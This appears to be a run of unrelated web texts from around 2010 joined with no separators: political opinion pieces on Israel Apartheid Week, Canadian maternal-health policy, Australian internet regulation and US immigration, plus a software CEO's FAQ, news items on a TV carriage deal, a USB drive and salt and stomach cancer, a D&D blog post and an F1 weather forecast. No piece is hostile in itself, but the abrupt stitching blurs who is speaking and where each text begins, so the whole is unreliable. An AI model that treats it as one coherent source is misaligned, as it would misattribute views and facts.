In Canada , the only way to shut down the movement is to vilify it as hateful or anti-semitic .
That is what our parliamentarians are now trying to do .
I am Jewish and have been working one and off for Palestinian rights for many years , as have many other Jews who feel a special responsibility to speak out against injustices committed by Israel .
During that time , I have rarely experienced any anti-semitism .
In the IAW organizing , I have experienced none .
If Israel is losing legitimacy in the world , it is because of what their government is doing to the Palestinians , not because of anti-semitism .
> This attempt to shut down criticism of Israel is the most frightening assault on freedom of speech I have ever seen in this country .
Whether or not you think Israel Apartheid Week is the best name for this week of discussion supporting Palestinian rights , please write your MP and your MPP and tell them you think it is wrong for Parliamentarians to denounce this kind of educational activity .
First off , let me apologize to everyone who PMs me , emails me , facebooks me , etc .
I do n’t mean to blow anyone off .
I am generally so swamped that I just do n’t get to my email .
So what I ’m going to start doing is answering some of the more common messages I get here and simply refer people here instead .
Second , obviously , I ’m dangerously lazy .
Third , for those who are wondering who the heck I am , I ’m the President & CEO of Stardock .
To get a fuller story you can read this wall of text I wrote 6 years ago .
So here are answers :
Q : I want to be a game designer , what classes should I take ?
A : Software development .
You need to be a programmer first .
There is no lack of ideas for games .
It ’s always a question of execution .
Knowing what ’s involved in making something a reality is absolutely crucial and in game design , that means programming .
It also helps if you ’re an artist – which I ’m not .
Q : I want to be a game artist , any suggestions ?
A : I ’m not an artist but I do know the guys really look at how well one can draw without computers .
If your ability to sketch , paint , or draw something is poor , you may want to consider a different career path .
There are a lot of guys who come in knowing how to do great things with 3D Studio , Maya or After Effects but those skills alone , while important , wo n’t make someone competitive imo .
Q : What ’s more important ?
Intelligence or Charisma .
A : Neither .
Self Discipline would be my answer .
The ability to make yourself work on something even when you really do n’t want to is very important .
Q : Do people have to work long hours to be successful ?
A : Depends on how you define “ success ” .
Accomplishment = Productivity X Time .
Q : Can you name any unique traits that you think might give you an advantage ?
High intelligence ?
Ability to learn new things quickly ?
Creativity ?
Wisdom ?
A : I do n’t think I necessarily have any of those traits in any great degree or certainly not enough to given me a unique advantage .
I would say I am unusually healthy .
I do n’t get sick .
Ever .
And while I like sleep , I do n’t normally get tired .
Though ironically , this past Friday I was so tired I had to go home early .
Thinking about your email jinxed it .
Q : What personal trait do you think is most harmful to success ?
A : Pride .
Worrying about your pride will ruin you if you let it .
Focus on achieving something excellent .
Q : What motivates you ?
Money ?
Power ?
Glory ?
A : None of the above .
I really enjoy working on excellent things .
If you create something exceptional , the rest will take care of itself .
Q : What got you into skinning [ referring to things like WindowBlinds ]
A : I really like having my computer look , feel , and function exactly how I want it .
I guess I ’m an extreme individualist .
Q : I ’ve read that you ’re a Valve “ fanboy ” .
If so , why make Impulse ?
Do you really think Impulse can beat Steam ?
A : Well first , I ’m a fanboy of Valve because they are everything I admire – excellent .
I do n’t really see Impulse or Steam as an either / or thing .
I use Steam .
I do n’t want Steam to be “ beaten ” .
But I think as excellent as Steam is , there is a lot more to go and I do not like concentrations of power .
I think a lot of people feel the same way we do otherwise Impulse ’s sales would n’t be increasing at such a ridiculous rate .
People want Impulse to succeed for the same reasons I do – we want multiple options and we want to keep all these guys on their toes .
I also like Intel a lot but I ’m glad there ’s an AMD .
Q : Do n’t you think Stardock is getting a little too big for its CEO to hang out on Internet forums mixing it up with its fans and detractors ?
A : The job of a CEO is to satisfy the shareholders .
As the principle shareholder , I ’m satisfied .
Seriously though , I got into this sort of thing as a forum user in the first place .
I ran BBSes back in the 80s before I could drive a car .
The architect of our community IT here at Stardock was actually the owner of the competing BBS from back then ( we ’ve worked together now 20 + years ) .
So participating on forums is the ends , not the means of doing what I do .
Q : What do you think is one of the most important ingredients in a successful software company ?
A : Low turn over .
When people visit or join Stardock they ’re amazed at how low our turn over is .
The last person to voluntarily leave Stardock left last June .
It was a big deal .
We had a going away party and we were sad but happy for his new endeavor .
Low turn over is important because the longer good and talented people are around , the more company - specific knowledge they accumulate .
As a result , we can do a lot more with a lot fewer people .
Q : Do you really believe software piracy is n’t a problem ?
A : This view is often ascribed to me .
Piracy absolutely is a problem .
The question is how do you deal with it ?
Every time I see someone warezing one of our programs it upsets me .
I saw some guy posting links to CursorFX and IconPackager the other day .
It ’s like “ Really ?
Really ?
Those programs are less than 10 bucks and took a lot of time and effort . ”
I can totally relate to the urge to put draconian copy protection on things .
But I do n’t want to do things that punishes legitimate customers .
I do n’t want legitimate users to feel like chumps for playing by the rules .
That ’s my position .
That ’s why CDs in the drive bugged me .
That ’s why entering codes bugged me .
Or why things that installed extra stuff just for copy protection bugged me .
I ’ll buy your stuff happily , just do n’t treat me feel like a fool for doing so .
EL SEGUNDO , Calif. , and PHILADELPHIA – DIRECTV and Comcast have reached an agreement to return VERSUS to the DIRECTV programming lineup today .
The terms of the deal were not disclosed .
VERSUS will return to the same DIRECTV programming packages it was in at the end of August 2009 .
" We are pleased that both sides were able to work out a satisfactory deal to bring this programming back to our customers , " said Derek Chang , executive vice president , Content Strategy and Development , DIRECTV .
" We 're excited that we were able to come to a fair agreement that puts VERSUS back in millions of homes with DIRECTV in time for our busy spring programming schedule , " said Jamie Davis , president of VERSUS .
" We look forward to super - serving these fans with NHL regular - season and playoff coverage , our first live UFC event and much more . "
View Less
Kingston DataTraveler 310
( PhysOrg.com ) -- Kingston has released a new 256 GB USB flash drive for sale in the US .
The drive is called the DataTraveler 310 and is basically the same as the model DataTraveler 300 , also with a massive 256 GB capacity , which went on sale in Europe , the Middle East , Africa and the Asia / Pacific region in mid 2009 .
The DataTraveler 310 is a standard flash drive but it can store data equivalent to up to 54 DVDs , 365 CDs or 51,000 pictures , according to Kingston ’s USB business manager Andrew Ewing .
He said feedback from customers and the company ’s own research had found there was a need for an easy storage solution for large amounts of data , and the device would be useful for people such as engineers , architects , and designers , who need to transport and store huge data files .
The DataTraveler 310 is compatible with Windows ( XP , Vista and 7 ) , Linux ( v2.6 or later ) , and Mac ( v10.3 or higher ) .
Data transfer rates for the new flash drive are 25 MB per second ( read ) , and 12 MB per second ( write ) .
Up to about 90 % of the flash drive ’s capacity can be password protected without the need for administrator rights .
The dimensions of the device are only 73.7 x 22.2 x 16.1 millimeters .
It comes with a protective cap that can be fitted to the back of the flash drive .
The recommended retail price for the DataTraveler 310 is $ 1,108 , and it is protected by a five - year warranty .
It is the first USB flash drive of its capacity to be offered for sale in the US .
Explore further Kingston Unveils the World ’s First 256GB USB Flash Drive
© 2010 PhysOrg.com
NEW YORK ( Reuters Health ) - A salty diet may increase the risk of stomach cancer by 10 percent , South Korean researchers found in a study of more than 2 million people .
Makgeolli and tidbits are set at a bar in Seoul October 16 , 2009 .
REUTERS / Lee Jae Won
They found a “ weak but positive ” association between a preference for salt and an increased risk of stomach cancer .
Although the mechanisms by which salt may be involved in the development of stomach cancer remain unclear , “ restricting salt intake is thought to be beneficial for preventing gastric cancer , ” Jeongseon Kim and colleagues from the National Cancer Center Research Institute in Goyang - si , South Korea , note in the American Journal of Clinical Nutrition .
Stomach cancer ( or gastric cancer ) is a major cancer in much of the world but not the United States .
While gastric cancer is declining , it is still the most common cancer in Korea .
Past studies have yielded conflicting results as to whether a salty diet causes gastric cancer , though most found an association between salt use and gastric cancer .
Kim and colleagues assessed the effect of salt preference in relation to gastric cancer in more than 2.2 million South Korean adults aged 30 to 80 years old .
All of them provided information on diet and lifestyle and had health checkups between 1996 and 1997 .
According to the Korea Central Cancer Registry , over the course of 7 years , 9,620 men and 2,773 women developed stomach cancer .
According to Kim and colleagues , people who preferred salty diets had a 10 percent increased risk of developing gastric cancer .
Dr. Al B. Benson III , a gastric cancer specialist from Northwestern University ’s Feinberg School of Medicine in Chicago , who was not involved in the study , said while the Korean findings are not definitive , they do support the long - suspected association between salt intake and gastric cancer .
He said how salt is consumed may be important .
For example , he cited a Japanese study that found that sodium in the form of table salt posed risks for heart disease but not cancer , while salted foods , such as processed fish , were associated with cancer and not cardiovascular disease .
“ The implication is that in areas where salt is used as a way to preserve foods , such as pickling , there is a higher risk , ” Benson explained .
“ This link would make sense for Asian countries and Eastern Europe , including Russia in particular , where salting of foods has been a mainstay of the diet . ”
Benson also noted that incidence of gastric cancer , while higher than in the United States , has been declining in Korea , due largely to changes in the diet and also in food preservation of methods , especially the use of refrigeration .
The same sort of decline in gastric cancer occurred in the United States decades ago .
“ Gastric cancer was the leading cause of cancer death in the United States in the 1930s , but rates have dropped over time , probably due to a number of factors , ” including declining rates of infection with Helicobacter pylori ( a bacterium responsible for ulcers and stomach inflammation ) , ” Dr. Eric Jacobs , of the American Cancer Society in Atlanta , who was not involved in the study , noted in an email to Reuters Health .
Gastric cancer no longer ranks among the 10 most common cancers in this country , Jacobs mentioned .
Still , the American Cancer Society estimates that there were about 21,000 new cases of gastric cancer and 11,000 deaths from gastric cancer in the U.S. in 2009 .
Should Americans cut back on salt to prevent gastric cancer ?
Marji McCullough , nutritional epidemiologist at the American Cancer Society , said , “ It is not clear that reducing salt consumption would meaningfully reduce gastric cancer risk in U.S. populations .
However , U.S. government guidelines recommend avoiding excessive salt intake in order to reduce risk of high blood pressure . ”
Benson said immigrants might want to take a closer look at their dietary salt intake .
“ If you now live in the United States , although are originally from an area of the world with high gastric cancer rates , then you should look at your current diet and consider reduction of salted foods .
Otherwise , for most of the U.S. population , ( the Korean ) study would not be relevant , ” Benson noted .
SOURCE : American Journal of Clinical Nutrition , online March 10 , 2010 .
The Canadian government is excluding family planning from its initiative to save the lives and improve the health of mothers in poor countries .
One small problem :
You can't address maternal mortality without family planning .
In an act that appears to reflect a global epidemic of political absurdity , aversion to evidence , and “ un- reality ” show searches for “ common ground ” efforts that do not address the core problems we face , the Canadian government has decided to exclude support for contraceptive programs , supplies , and information from its initiative to save the lives and improve the health of mothers in poor countries .
There ’s only one small problem :
You ca n’t “ save the lives and improve the health of mothers ” without family planning .
The Globe and Mail reports today that “ in no uncertain terms , Foreign Minister Lawrence Cannon yesterday ruled out any kind of family - planning programs being included in Canada ’s “ signature ” initiative at June ’s G8 summit – a strategy to improve the health of mothers and young children in poor countries . ”
The Conservative government has offered an explanation for why it will exclude contraception from its initiative to improve the health of mothers in poor countries : Birth control does n’t fit with saving lives .
Sex . Abortion .
Parenthood .
Power .
The latest news , delivered straight to your inbox .
SUBSCRIBE
“ It does not deal in any way , shape or form with family planning .
Indeed , the purpose of this is to be able to save lives , ” Mr. Cannon told the Foreign Affairs committee .
Really ?
Are they kidding ?
Nearly 600,000 women die each year due to complications of pregnancy , labor , childbirth or unsafe abortion .
Family planning is the first and most critical prevention intervention .
Programs to reduce maternal mortality and morbidity that do not include family planning will be as effective as plans to reduce motor vehicle mortality by abolishing seat belts , to reduce diabetes by force - feeding corn syrup to diabetics , and reduce dental decay by forbidding the sale of toothpaste .
Such programs will be about as successful in reducing maternal deaths –the leading cause of death among poor women ages 15 to 49 in most countries worldwide–as the no-condoms - for - youth policies and the abstinence - only - until - marriage programs of the Bush administration were in stopping the spread of HIV among women and girls in Africa .
Which is to say : A stupendous failure .
The Globe and Mail reports that “ maternal - health advocates worry that the government ’s desire to steer clear of the abortion issue – and therefore not upset part of its political base – is also pushing it to rule out all other family - planning programs , like distributing contraceptives . ”
“ This is really playing to the base in tractor - loads rather than with shovels , ” Katherine McDonald , executive director of Action Canada for Population and Development , told the Globe and Mail .
She argues that no maternal - health policy can be effective without providing ways for women to space out pregnancies , because many childbirth deaths are caused by complications from having too many pregnancies too quickly or from unsafe abortions .
Yet , conservatives in Canada as elsewhere , appear unable to face the fact that women are people who engage in sexual activity ; that pregnancy often results from said activity ; and that millions of women today throughout the world experience unintended and unwanted pregnancies–and consequently have more children than they desire–due to lack of real and consistent access to the most basic contraceptive information and supplies .
They likewise appear unable to understand that due to early marriage , lack of economic alternatives , social pressure , high rates of gender - based violence or all of the above , women may have little control over whether , when and to whom they get married and whether , when and with whom they have sex ; that millions of these women worry endlessly about how they will care for existing children and families and how to avoid another pregnancy ; and that those same women name access to basic contraceptive supplies and family planning programs as an urgent priority .
Their priority .
Moreover , even in the best of marital or partnership situations , women and couples want to plan their families …. or Canada itself would have a far higher total fertility rate than it does today .
Finally , conservatives–and increasingly it appears some international women ’s groups and some liberals–also clearly are unable to face the reality that in response to unintended and unwanted pregnancy , women turn to abortion .
Some 75,000 women die each year and many times that number face disabling health consequences as a result of unsafe abortion , in their desperation not to bear yet another child for which they can not care and which they can not feed .
By reducing unintended pregnancies , basic family planning programs allow women to take control of some aspect of their lives , to plan ahead , and to care for their families .
Such programs are proven to save lives .
By preventing and reducing the number of unintended pregnancies , contraceptives reduce the need for abortion .
They allow women to space pregnancies .
They enable women with conditions like vesico - vaginal fistula , high blood pressure , uterine prolapse and other dangerous conditions to avoid high - risk pregnancies .
They save the lives of women .
They also save the lives of children .
In high fertility socieities , voluntary family planning programs increase infant birth weight , and reduce neo-natal and infant mortality .
Moreover , because children ages 0 to 5 are more likely to die if their mothers have died , reducing maternal mortality through family planning has enormous impacts on the health and survival of families .
It is true without question that women also need access to trained birth attendants , to good pre- and post-natal care , to good nutrition and to emergency obstetric care .
But contrary to the new common ground fad , efforts to reduce maternal mortality are not part of a buffet plan where you pick and choose what is “ politically acceptable , ” just as an internist does n’t decide he or she will take blood pressure but does n’t like doing EKGs or X - rays .
They are part of a continuum that starts with enabling women to choose whether and when to be pregnant in the first place , and that starts with family planning information and supplies .
To hear that the Canadian government now can say with a straight face that family planning programs are not part of a program of “ saving lives ” of women and infants is so absurd that I am at a complete loss of confidence about rational thinking in the world today , leading me to ask how Canadians voted the current government into power .
But then of course , I have to remind myself I live in the United States , the center of the anti-choice , anti-fact universe and that U.S. politicians now in or running for office actually brag about their efforts to strip women of all their rights .
Canada has already taken such steps by denying funding to the very organizations that reach the greatest number of poor women :
The International Planned Parenthood Federation used to receive funding from the Canadian International Development Agency , but its nine - month - old request for a renewal of its $ 6 - million - a - year grant has so far gone unanswered and funding stopped in December .
Folks …we have a pack of elephants in our collective living room .
One is called sex , the other is called power , the third is called reproduction .
These elephants have been trying to tell us–indeed they have been virtually screaming –for some time that if we do n’t pay attention to both the immediate needs of women for access to contraception , HIV prevention ( and the two go hand - in - hand ) , unwanted pregnancy , healthy wanted pregnancies , and safe abortion services , we are not dealing in reality .
We will not solve the maternal health crisis .
And , if we are more concerned with our pseudo - anti - fact reality , or our conservative base , or our own re-election , or all of the above , then we are ignoring reality , and we are in turn responsible for , in so many words , telling women to go jump off a cliff .
Let ’s not pretend otherwise through statements that not only evade the truth , but instead foster lies .
If you are not willing to address these issues , you do n’t care about women and girls and maternal illness and death .
You are instead using this issue for your own political gain .
I know is not “ politic ” to say but it really is as simple as that .
And it is a “ dying ” shame .
Adding Favours to Treasure Bundles
“ Your reward for rescuing the Duke ’s daughter is a magical weapon , a suit of enchanted armor and a favour . ”
As D&D characters become more and more powerful they always seem to become filthy rich along the way .
At first they reinvest their newly gotten gains in themselves , purchasing new weapons , armor and magical items .
But after a few levels they have everything they need and they start accumulating wealth .
Massive amounts of wealth .
I have numerous characters at or above level 10 and all of them have thousands of gold pieces recorded on their character sheet .
And the money continues piling up as they continue adventuring .
Now I can spend the cash for the sake of spending the cash , but honestly there ’s nothing that these character want or need .
They already have magic items in every item slot of their character sheet .
Eventually these PCs hit a point where any monetary rewards become inconsequential .
I mean what can you buy with 20,000 gp that you could n’t buy with 15,000 gp ?
As a player I find that the material rewards that accompany high level adventuring are n’t nearly as satisfying as the rewards that accompany those first few levels .
So as a DM I ’ve come up with a solution .
I ’m going to replace monetary rewards with favours .
When the Duke ’s daughter is kidnapped and he hires adventurers to rescue her , he ’s not going to offer them the expected 250 gp each .
Instead he ’ll offer the party a favour .
If they ’re successful then the Duke is in their debt and they can call upon him for a favour in the future .
This actually accomplishes a few goals simultaneously .
First and foremost it gives the PC a reward other than gold pieces .
If they already have thousands of gp , then this kind of reward could be more valuable to them in the long run .
Second it encourages role - playing .
I ’ve often commented on how a lot of gamers minimize the role - playing in favour of the number crunching .
By rewarding the PCs with favours in stead of gp it removes one of the numbers commonly crunched and forces the PC to role - play and interact with the NPC in order to get the reward they ’ve were promised .
This also opens up fantastic opportunities for the DM .
Once the PCs have a few favours in their bag of holding , the DM can put the party in situations where they can actually star calling in their favours .
The outcome of an adventure should n’t hinge on using the favour , but there should be a clear advantage or short cut if they do .
It also encourages the players to be creative .
As they start banking favours they ’ll want to keep track of what goods and services each person in their debt is capable delivering .
It may be a few levels before they need to charter a ship , but when that time comes they know they can visit their friend – the captain of the Wave Crasher – and he ’ll repay the favour he owes them by whisking them to their destination at a discounted rate or possibly even free of charge .
As excited as I am at the possibility introducing favours to my treasure bundles , I ’m not going to do away with monetary rewards all together .
As I mentioned above , during those first few levels PCs need every gp they can get their hands on .
But after a few levels it ’s time to start swapping out gold pieces from the treasure bundles and replacing them with favours .
Depending on how many favours you introduce into your campaign it may becomes necessary to track how much each favour is worth .
If you ’ve replaced a 100 gp treasure bundle with a favour then whatever the PCs decide to use the favour for should fall into the 100 gp ballpark .
A simpler way to track the value of favours is to note the PCs level when they earned the favour .
If they were level 3 when they earned the sea captain ’s favour , then cashing it in when they ’re level 10 probably wo n’t seem all that spectacular .
It should still give them an edge , but if it the PCs have let too much time pass before calling in their favour then the DM may want to adjust the type of compensation accordingly .
My expectation is that by introducing favours as rewards the PCs will do what they can to keep in touch with the people indebted to them .
This likely means more role - playing .
And if the PCs begin role - playing more often because of the favours , I ’m a lot more likely to forget the favour ’s “ value ” and just assume that when they need to call it in , they get what they want .
What are your thought on the idea of favours as rewards ?
As a player would you feel cheated if you merely got “ future considerations ” for completing your objective or do you see this as a reward better than gold ?
Looking for instant updates ?
Subscribe to the Dungeon ’s Master feed !
Pin 0 Shares
There are jerks on the internet .
Given how many jerks there are off the internet , this should n't surprise anyone .
( I 'm willing to bet that the first cave painting was barely dry before a jerk came along and drew an oversized penis on one of the animals . )
Nevertheless , the offensive defacement last week of two Facebook pages , tributes to slain Queensland children Elliott Fletcher and Trinity Bates , became a minor flap in the media .
Words like " sinister " , " disgusting " and " sick " quickly appeared in various articles .
Where an outraged media go , politicians quickly follow .
Barely one news cycle after the story about tasteless Facebook pranks , Senator Nick Xenophon has proposed an " online ombudsman " to " deal with such incidents " , an idea tentatively endorsed by the Prime Minister .
Meanwhile , Queensland premier Anna Bligh wrote to Facebook angrily demanding an explanation .
This is the cue for tired cyber- libertarians to again point out the internet is global and dynamic and instructing the Australian civil service to police it might be a touch impractical .
But this cycle -- internet nastiness , media attention , government condemnation -- is repeating itself with depressing regularity .
( The mandatory internet filter and proposed crackdown on racist material online are still current news . )
Can anyone seriously imagine a government department , staffed by dozens of bureaucrats , investigating a tasteless Facebook page set up by a bored high - schooler ?
This appears to be exactly what our leaders are suggesting , and it 's easy to point out the flaws in such an idea .
But has debating these schemes on their merits become counter - productive ?
Let 's take a step back for a moment .
Perhaps what we should really be discussing is whether this is an appropriate topic for lawmakers to tackle at all .
The internet is a positive part of our daily lives -- nobody is seriously contending that it is so broken that it needs the Australian Labor Party to fix it .
When did we become so over - sensitive that a dodgy web page requires intervention by the premier , Senate and prime minister ?
Certainly , the tawdriness of these pages is depressing , even outrageous , and few could dispute that .
Its newsworthiness is at best arguable .
So how did it become a legislative priority ?
Given that no serious lasting harm or economic damage can be caused by such a defaced web page , how could one seriously argue this is a matter suitable for prime ministerial comment ?
Moreover , it says something unflattering about our national character that , when something like this comes to light , we turn at once to our politicians to save us .
This is n't a trait one would associate with a mature society confident in its place in the world .
It 's a trait one would more likely associate with mollycoddled children .
The stereotypical view of Americans holds them to be forever demanding " offensive " things be taken down , banned , censored or zero - toleranced , and one might wonder if the same trend is happening here -- where we have no Bill of Rights to stem the tide .
Being offended is n't like being physically assaulted .
Like most people who read the news in this day and age , I 'm offended pretty much all the time , but I can get over it and still have a productive day .
Those that can't should n't be setting the bar for regulation of the media .
I submit then that next time a web page is defaced , a racist game is published , or somebody is upset by a cyber - stalker , let 's handle it calmly like adults .
Suck it up .
The appropriate place for complaints is the host of the content , who may or may not take it down , as Facebook promptly did last week .
Let 's leave the politicians out of it .
I do n't care what the PM thinks about Facebook any more than I want his comments on a TV turkey slap .
They have more important things to worry about .
( Originally published in Crikey . )
April 26 , 2010
Dear Friend of Liberty ,
The recent legislation in Arizona has put immigration back in the news .
The Libertarian Party has a long history of defending immigration .
Our website has an article discussing immigration .
I think that if there ’s a problem with massive illegal immigration , then one of the best solutions is to make legal immigration easier .
From an economic point of view , immigrants are an asset , not a liability .
Business owners usually understand that , but politicians often either do n’t understand or do n’t care .
In an environment of fear , which is where many politicians seem to want to keep us , they use immigrants ( both legal and illegal ) as scapegoats so they can duck blame for problems caused by too much government .
Republican George W. Bush gave us the enormously expensive Medicare prescription entitlement .
Republican Senator John McCain famously put his 2008 presidential campaign on hold to rush back to Washington to bail out failed banks and businesses .
When times are tough , focusing on immigrants helps distract from these homegrown threats to our economy .
Perhaps I have a soft spot in my heart for immigrants and foreigners .
I ’ve traveled extensively and lived overseas .
I worked for six months in South Africa and was welcomed by blacks and whites into their communities .
I ’ve spent over six months of my life traveling throughout Mexico .
Recently having lived in Texas , I ’ve met and worked with a lot of Mexican nationals who were in Texas working hard in the construction industry .
I can imagine that if I ’d been born in Mexico or Central America , and the American immigration laws were so convoluted , I ’d have found my way around them one way or another .
I realize immigration , legal and illegal , is a controversial issue both for Americans in general and for Libertarians .
Obviously , some immigrants take advantage of our welfare system .
( That ’s one more reason to get rid of government welfare . )
And some immigrants commit violent crimes .
( That ’s one more reason to get rid of victimless crime laws that waste police effort and fill up our prisons with people who have n’t hurt anyone . )
However , those are n’t good reasons to stop people from coming to America .
America was founded by immigrants , many of whom were escaping economic and religious oppression .
I think support for immigrants , many of whom are poor and honest , shows our humanitarian side to those who want to characterize Libertarians as uncaring individualists .
I ’m also very concerned that the immigration debate will be used as an excuse to impose a National ID card .
( Let me see your papers ! )
Now is the time to stand up for liberty .
We must not let the federal government use immigration restrictions as a sneaky way to crack down on all Americans and take away our freedoms .
See this Cato study on the economic effects of immigration reform .
Sincerely ,
Wes Benedict
Executive Director
Libertarian National Committee
P.S. If you have not yet become a member of the Libertarian Party and
wish to do so , please click here and join the only political party
dedicated to free markets and civil liberties .
If you need to renew ,
please click here .
If you would like to make a contribution separate
from membership , please click here .
A blog about roleplaying games .
I talk about old school , and new school .
I talk about ways to tell stories , explore new worlds and have fun with your friends .
I love many games but Tunnels & Trolls by Ken St. Andre has a special place in my heart .
It reopened Pandora 's Box , again .
Tunnels & Trolls is a trademark of Flying Buffalo Inc .
In memory of Dave Arneson .
( NB : THIS FORECAST WILL BE PERIODICALLY UPDATED . )
CLOSING REMARKS :
What a race !
The early rain certainly made all the difference - plus some fantastic track action all - round .
Well done Jenson ; let 's see what Malaysia brings - early indications offer a threat of wet weather emerging again as a factor ...
NOWCAST UPDATE , SUN .
07:10HRS BST : I expect it to turn dry for a while now ... tricky stuff !!
NOWCAST UPDATE , SUN .
06:15HRS BST : Further showery outbreaks of rain likely across the circuit in the next 45 mins .
NOWCAST UPDATE : SUN .
05:30HRS BST : The Met Office 's model got it spot - on in terms of timing : some rain has already fallen across Albert Park ahead of the race starting , but it 'll now prove quite knife - edge in terms of how much affects the race itself .
Patchy outbreaks of drizzle and light rain are quite extensive to the NW , feeding towards Melbourne , albeit as expected the heavier pulses are crossing away to the southwest .
Intermittently damp weather looks decidely likely for Albert Park , but any such conditions ( assuming rain does n't become persistent ) should quite readily dry off the circuit given the breeze and temperature .
Wind currently northerly , about 13 mph , gusting to 25 mph .
----------------------------------------------------------------------------------------------------
This is a ' new style ' approach to the weather forecasts I 've previously provided on the BBC's 606 Forum , alongside our live online , radio and TV coverage of all the action during each Formula One race weekend .
The 2nd race of the 2010 season - the Australian Grand Prix - takes place at Albert Park , Melbourne , this coming weekend and I 'll keep you updated here on the developing weather prospects .
Dry running is pictured here at Melbourne , but will this year 's event escape the rain entirely ?
( Photo : William West / Getty Images )
Unlike the dry , almost cloudless conditions experienced a fortnight ago in Bahrain , there 's a chance of some rain falling periodically in Melbourne to add additional on - track uncertainty through the coming weekend .
And do n't underestimate the wind : this could prove quite an issue later on Sunday !!
Since I first opened this blog entry , it 's been noteworthy how the essential forecast theme has changed very little - irrespective of whatever meteorological model is followed .
This continuity provides high confidence in the broad thrust of the Melbourne forecast , albeit the local detail will inevitably now prove more of a ' nowcast ' issue .
And with this in mind , you can keep an eye on the local rainfall radar ( as the teams surely will ! ) through this link .
So , here 's the current forecast thinking :
The UK Met Office 's Global Model , above , hints at the expected proximity & generally light intensity of rain during the Australian Grand Prix ( which starts at 5 pm local time ) .
Other forecast models offer a broadly similar solution .
SUNDAY FORECAST :
Summary & model assessment : Light to moderate rain highly likely during the race .
Turning quite windy .
Overcast but very warm .
Unsettled conditions are spreading eastwards as an area of low pressure ( circa 1000 mB ) moves across the Great Australian Bight towards Tasmania , swinging a trough and a band of rain , some heavy , into coastal districts of South Australia and then across parts of SW Victoria .
The various forecast models we employ ( UK Met Office 's Global Model ; USA 's GFS ; plus the Australian Bureau of Meteorology 's own prediction ) all offer agreement on the evolution and provide improving continuity regarding the timing of rainfall progression into Melbourne .
Precipitation & cloud cover :
Some showery outbreaks of light rain have crossed Melbourne overnight and it's likely the circuit will prove rather ' green ' again by dawn .
It 'll be an overcast race with cloud cover becoming quite extensive well before the race start at 5 pm local time .
The probability of light to moderate rain affecting the event , more especially post - 6 pm local time , is now considered high .
The Met Office 's Global Model suggests the rain could arrive patchily ( as drizzle or generally light intensity ) even by the start of the race .
This could increase a little in intensity later , albeit peak rainfall rates are unlikely to ever exceed 3 - 5 mm per hour .
The US - GFS model , running at similar resolution , has flip - flopped repeatedly in recent runs between offering light rain above Melbourne by the race start , or holding it out west until later .
The latest ( 1200 GMT ) output reverts back to the slightly slower solution , with light rain arriving towards the end of the event .
The Australian Bureau of Meteorology 's prediction , combining the output of 9 national and international models , further supports the notion of any rainfall being light in nature .
So broadly , the UKMO , GFS and other models offer comparable forecasts in terms of both the high likelihood of some damp weather arriving into Melbourne districts at some stage during the race ( if not actually by 5 pm local ) and the generally light to moderate intensity of any precipitation once in - situ .
So it 's now a nowcast issue ....
Temperature :
With the prevailing flow off the hot continental interior , it will become very warm at around 29 - 31C mid-afternoon .
Ambient temperature during the race likely to be 28 - 29C .
Wind : Could be key factor , in my opinion .
It will turn noticeably breezy during the afternoon , with the north to northeasterly wind gusting 25 + mph at times and possibly over 30 mph periodically by the start of ( and during ) the race .
The Met Office modelling suggests a prevailing NNE wind averaging from 10 - 15 mph .
It will offer a headwind component on the pit straight ; a tricky , gusty crosswind in some of the other sections not well sheltered by the trees and perhaps critically , a noticeable tailwind element through the back of the circuit from turns 10 - 13 .
Local funnelling effects of the wind through the adjacent urban areas and down the walled sections of the circuit such as from turns 10 to 11 could be quite an issue , affecting braking stability into the ( ever - tricky ) high speed left - right switch at 11 - 12 ; ditto into the quite fast right - hander at turn 13 .
All the latest forecast model runs continue to hold any threat of heavy rain W/ SW of Melbourne until later into the evening .
However , even intermittent light rain will add a real lottery to proceedings , as emphasised by Hirohide Hamashima , Bridgestone 's director of motorsport tyre development :
" If there is rain before tomorrow 's race we will face quite a difficult track , and those starting on the soft tyre will have the concern of graining on the left tyres , either front , rear , or both depending on the car and set - up .
If a driver can protect their tyres then a one stop strategy should be possible ... The soft tyre is around 0.5 seconds faster for its fastest lap than the harder tyre , but we really do n't have sufficient data to know how long it will last here .
This , and the variable of the Melbourne weather , will be the biggest unknowns for tomorrow's race . "
I do urge keeping a close eye on the rainfall radar ( here 's an alternative version , if you so prefer ) - this will offer a real - time answer as to whether it 'll rain by race start ( and save me trying to type innumerable updates ; I 'll find it tricky due to mounting excitement / stress level as the race unfolds ! )
----------------------------------------------------
( Previous forecasts : )
SATURDAY :
NOWCAST UPDATE , 05:20HRS GMT : Some moderate intensification of the showery rain to the west of Melbourne , but current trajectories suggest these are likely to run south of the city .
NOWCAST UPDATE , 04:10HRS GMT : Despite a scattering of light showers in parts of Victoria , it 's highly likely qualifying should remain dry .
FORECAST : High pressure ( 1024 mB ) sits over Tasmania and the remnants of Friday 's front continues to decay over Victoria .
Largely cloudy conditions will once again prevail and a good deal of dry weather will dominate during the day .
There 's a small chance of isolated light to moderate showers developing above Melbourne through the morning and into early afternoon .
Some could appear during 3rd practice and indeed there 's a risk of some further showers during qualifying ( starting at 5 pm local time ) , but on balance it 's very likely both sessions will run in the dry ..
Temperatures will be somewhat less than Friday 's values , peaking around 24C into the afternoon .
Winds will be predominantly light / moderate SE to then SW for much of the morning and early afternoon , averaging 8 - 10 mph .
FRIDAY :
NOWCAST UPDATE , FRIDAY 0606GMT :
The current shower will soon fade - some running likely again soon thereafter , assuming the track dries speedily .
But more showers still likely in the next 30 mins .
NOWCAST UPDATE , FRIDAY , 0555GMT :
The first shower duly arrived and more look likely before the end of this session .
Signs of moderate intensification of these shower cells on rainfall radar ... doubtless the teams well aware that they need to take full advantage of the current dry window .
NOWCAST UPDATE , FRIDAY , 0500GMT : Light to moderate showers crossing eastwards , as now seen on rainfall radar , look likely to affect the Melbourne district towards 2nd Practice .
Currently the heavier ( and in places thundery ) showers are remaining well south of the city .
FORECAST : An area of high pressure slowly eases eastwards from southeastern Australia , with another established out west across the Great Australian Bight .
An ever - weakening cold front will sit between the two anticyclones during Friday , arcing northwards above Tasmania but quickly losing intensity in - situ .
Dry weather should thus dominate during both practice sessions , with a small chance of isolated showers appearing as the day develops .
Most of these should be light in nature , but there 's sufficient instability aloft to offer a scattered sharper ( possibly even thundery ) shower .
It 'll prove a hit - and - miss situation , more especially into 2nd practice .
So worth watching the rainfall radar link I provided earlier in this blog ...
Increasingly cloudy skies will be above Albert Park during the afternoon as temperatures reach about 25 - 27C .
Winds will shift from N / NW around to SW by midday ; a tad breezy , averaging approx .
10 - 15 mph but closer to 15 - 20 mph by midday .
